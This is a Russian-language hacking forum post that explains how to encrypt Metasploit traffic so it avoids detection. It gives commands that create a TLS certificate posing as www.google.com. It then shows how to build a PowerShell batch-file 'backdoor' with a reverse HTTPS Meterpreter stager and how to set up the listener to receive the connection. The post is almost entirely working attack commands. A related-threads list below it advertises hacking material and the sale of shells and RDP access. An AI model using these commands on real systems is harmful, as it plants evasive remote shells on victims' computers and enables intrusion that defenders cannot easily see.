Статья Шифрование трафика MSF для предотвращения обнаружения

Admin

Admin

Администратор

Шифрование трафика MSF для предотвращения обнаружения​

OpenSSL создает сертификат SSL/TLS:
Код: 
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

Создать бэкдор:
Код: 
LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat


При настройке прослушивателя требуются две дополнительные опции. Это делается для того, чтобы сообщить обработчику сертификата, который он будет использовать (такой же, как полезная нагрузка), и выполнить проверку сертификата SSL при получении соединения.

Код: 
HandlerSSLCert
StagerVerifySSLCert
set payload windows/meterpreter/reverse_winhttps
set LHOST 192.168.0.149
set LPORT 443
set HandlerSSLCert /home/kali/msf/www.google.com.pem
set StagerVerifySSLCert true
exploit

1769029519226


1769029531668
 
Для ответа нужно войти/зарегистрироваться
Похожие темы
S DNSCrypt – шифрование DNS трафика. Анонимность и приватность 1
Admin Интересно Прощай, RSA? США официально признали, что старое шифрование скоро «превратится в тыкву». Новости в сети 0
Admin Интересно Сквозное шифрование WhatsApp оказалось фикцией? Мессенджер сливал хакерам данные о наших телефонах годами. Новости в сети 0
Admin Статья Шифрование для ленивых Полезные статьи 0
Admin Статья Шифрование Полезные статьи 0
Support81 $244000000 за шифрование. VPN-инфраструктура теперь — бесплатный банкомат для хакеров Новости в сети 0
Support81 Шифрование — прошлый век: киберпреступники переходят на новую модель вымогательства Новости в сети 0
Support81 Дуров: «Лучше уйдём из Франции, чем сдадим шифрование» Новости в сети 0
Support81 Трёхслойное шифрование и туннелирование: BRICKSTORM сносит любую защиту на своём пути Новости в сети 0
Support81 Шифрование не спасет: как хакеры читают "защищенные" сообщения без взлома Новости в сети 0
Support81 HardBit 4.0: шифрование по паролю и сложные методы обхода анализа Новости в сети 0
Emilio_Gaviriya Статья Что такое шифрование с открытым ключом. Анонимность и приватность 0
Support81 Шифрование TutaCrypt: когда электронные письма играют в прятки с квантами Новости в сети 0
M BitLocker пароль на USB / Шифрование Анонимность и приватность 0
T Ассиметричное шифрование Полезные статьи 1
T Как работает SSL шифрование. Полезные статьи 0
K Реверсинг малвари для начинающих. Внедрение shellcode и шифрование malware-кода Уязвимости и взлом 0
Z OpenKeychain — шифрование сообщений в Android Готовый софт 0
Admin Статья Перехват трафика сотовой сети с помощью подменной Базовой Станции (FakeBTS), OpenBTS, YateBTS. Уязвимости и взлом 0
Admin Статья Альтернативные возможности использования iframe трафика Уязвимости и взлом 0
Admin Статья Методы маскировки трафика и обхода средств обнаружения и блокировок (ShadowSocks, V2Ray/X-Ray и Cloak) Анонимность и приватность 0
Admin Статья Методика добычи высококонвертируемого и дешевого трафика для целевых атак. Полезные статьи 0
TopTG Продавец @toptg | Вывод в топ поиска Телеграм = Генерация дешевого трафика Ищу работу. Предлагаю свои услуги. 0
G Интересно [ADS|CEO] поток трафика на ваш сайт Ищу работу. Предлагаю свои услуги. 1
CoderUnicorn Приветствуем всех, кто заинтересован в арбитраже трафика на платформах Google и Facebook! Предоставляю работу. Ищу специалиста. 0
Support81 Тайный декодер: ЕС вводит новые правила перехвата веб-трафика Новости в сети 0
I Прием: Шеллы, лом, дорвеи, любой спам, pops и другие источники не целевого трафика Доступы: RDP, VPS, SQL inj, базы, сайты, shell's 5
prizrak11 Интересно ГОТОВАЯ СХЕМА ТРАФИКА НА PPI-ФАЙЛООБМЕННИК ПРОФИТ $672 Способы заработка 0
Denik [Арбитраж Трафика] Ракета: источники бесплатного трафика (2022) Раздачи и сливы 0
DOMINUS Интересно В России скоро появится система полного контроля интернет-трафика Новости в сети 3
O Ищу годный арбитраж трафика! Парни, кто льёт трафик, напиши в тг, ЕСТЬ РАБОТА! Предоставляю работу. Ищу специалиста. 2
Cpa Monstro CPAMonstro - это группа экспертов в области маркетинга, арбитража трафика, SEO и SMM. Свободное общение 8
st.ap Схема по заработку на конвертации трафика из ютуба на кинопартнёрку. Способы заработка 1
andre5787 Арбитраж трафика от Василия Нашибы Способы заработка 0
W [Александр Пуминов] Арбитраж трафика через YouTube (2021) Способы заработка 2
R $ Фарм для абузеров трафика (дефолт) \\ Топ 1 сайт для накрутки Инсты $ Способы заработка 0
Admin Интересно Создание своего Shadowsocks и обфускация трафика [Часть 1] Анонимность и приватность 2
H Заработок на арбитраже трафика в своем сообществе Вконтакте в 2021м году Способы заработка 2
H Интересно Kismet — прослушка трафика Полезные статьи 0
E Потоки трафика US EU RU MIX Трафик: загрузки, инсталы, ads 0
C [Слив] Буржуазный арбитраж трафика сотни $ в день (2020) Способы заработка 0
Y Анонимность и Безопасность в Сети ч4 – Разделения трафика Анонимность и приватность 0
R R-Money.ru - партнерская программа по монетизации образовательного трафика! Ищу работу. Предлагаю свои услуги. 16
O Кейс по сливу трейдинг-трафика из Instagram и Telegram с ROI 187%. Предоставляю работу. Ищу специалиста. 0
S Виды шифрования и защиты трафика, выбор софта. Справочник анонима. Полезные статьи 1
B Заработок на сливе трафика из Facebook Программирование 4
A Арбитраж трафика с 0 или целевые посетители по 70 копеек Программирование 0
B Схема извлечения трафика из Ютюба с конвертацией на кинопартнерке. Программирование 0
J [ПАРТНЕРКА] Выгодная монетизация вашего трафика! Roi777.com Трафик: загрузки, инсталы, ads 0
Admin Prefix hijacking. Используем RPKI для борьбы с потерей трафика Полезные статьи 0

Название темы